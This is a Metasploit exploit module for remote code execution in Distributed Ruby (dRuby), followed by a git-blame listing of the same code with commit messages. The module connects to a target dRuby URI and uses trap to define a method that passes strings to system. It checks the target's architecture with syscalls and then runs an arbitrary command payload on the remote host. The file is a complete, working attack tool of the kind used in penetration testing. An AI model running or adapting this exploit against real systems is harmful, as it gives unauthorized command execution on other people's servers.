modules/exploits/linux/misc/drb_remote_codeexec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'drb/drb'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Distributed Ruby Remote Code Execution',
      'Description'    => %q{
        This module exploits remote code execution vulnerabilities in dRuby.
      },
      'Author'         => [ 'joernchen <joernchen[at]phenoelit.de>' ], #(Phenoelit)
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ],
          [ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ],
          [ 'URL', 'http://bugkraut.de/posts/tainting' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 32768,
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [
        ['Automatic', {}],
      ],
      'DisclosureDate' => 'Mar 23 2011',
      'DefaultTarget' => 0))


      register_options(
        [
          OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
        ])
  end

  def exploit
    serveruri = datastore['URI']
    DRb.start_service
    p = DRbObject.new_with_uri(serveruri)
    class << p
      undef :send
    end

    p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
    # syscall to decide whether it's 64 or 32 bit:
    # it's getpid on 32bit which will succeed, and writev on 64bit
    # which will fail due to missing args
    begin
      pid = p.send(:syscall, 20)
      p.send(:syscall, 37, pid, 23)
    rescue Errno::EBADF
      # 64 bit system
      pid = p.send(:syscall, 39)
      p.send(:syscall, 62, pid, 23)
    end
    p.send(:my_eval, payload.encoded)
  end
end
Minor fix to make dRuby great again 2016-12-23 15:12:22 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add a combined module for exploiting DRb. thanks joernchen! 2011-03-27 20:00:06 +00:00			`##`

			`require 'drb/drb'`
Add disclosure dates to all the exploit modules that didn't have one 2011-10-15 21:09:17 +00:00
use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = ExcellentRanking`
add a combined module for exploiting DRb. thanks joernchen! 2011-03-27 20:00:06 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
Make dRuby great again 2016-12-22 15:37:16 +01:00			`'Name' => 'Distributed Ruby Remote Code Execution',`
Retab modules 2013-08-30 16:28:54 -05:00			`'Description' => %q{`
Update description 2016-11-04 13:48:29 -05:00			`This module exploits remote code execution vulnerabilities in dRuby.`
Retab modules 2013-08-30 16:28:54 -05:00			`},`
			`'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], #(Phenoelit)`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ],`
Make dRuby great again 2016-12-22 15:37:16 +01:00			`[ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ],`
Clean up module 2016-12-28 06:10:46 -06:00			`[ 'URL', 'http://bugkraut.de/posts/tainting' ]`
Retab modules 2013-08-30 16:28:54 -05:00			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Space' => 32768,`
			`},`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
Add instance_eval and syscall targets 2016-11-04 13:47:36 -05:00			`'Targets' => [`
Clean up module 2016-12-28 06:10:46 -06:00			`['Automatic', {}],`
Add instance_eval and syscall targets 2016-11-04 13:47:36 -05:00			`],`
Retab modules 2013-08-30 16:28:54 -05:00			`'DisclosureDate' => 'Mar 23 2011',`
			`'DefaultTarget' => 0))`
add a combined module for exploiting DRb. thanks joernchen! 2011-03-27 20:00:06 +00:00
Solved most of msftidy issues with the /modules directory 2011-11-28 04:42:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`register_options(`
			`[`
			`OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
add a combined module for exploiting DRb. thanks joernchen! 2011-03-27 20:00:06 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
			`serveruri = datastore['URI']`
			`DRb.start_service`
			`p = DRbObject.new_with_uri(serveruri)`
			`class << p`
			`undef :send`
			`end`
Refactor module and use FileDropper 2016-11-04 13:54:26 -05:00
Make dRuby great again 2016-12-22 15:37:16 +01:00			`p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")`
			`# syscall to decide whether it's 64 or 32 bit:`
			`# it's getpid on 32bit which will succeed, and writev on 64bit`
			`# which will fail due to missing args`
Retab modules 2013-08-30 16:28:54 -05:00			`begin`
Make dRuby great again 2016-12-22 15:37:16 +01:00			`pid = p.send(:syscall, 20)`
			`p.send(:syscall, 37, pid, 23)`
			`rescue Errno::EBADF`
			`# 64 bit system`
			`pid = p.send(:syscall, 39)`
			`p.send(:syscall, 62, pid, 23)`
Refactor module and use FileDropper 2016-11-04 13:54:26 -05:00			`end`
Clean up module 2016-12-28 06:10:46 -06:00			`p.send(:my_eval, payload.encoded)`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
add a combined module for exploiting DRb. thanks joernchen! 2011-03-27 20:00:06 +00:00			`end`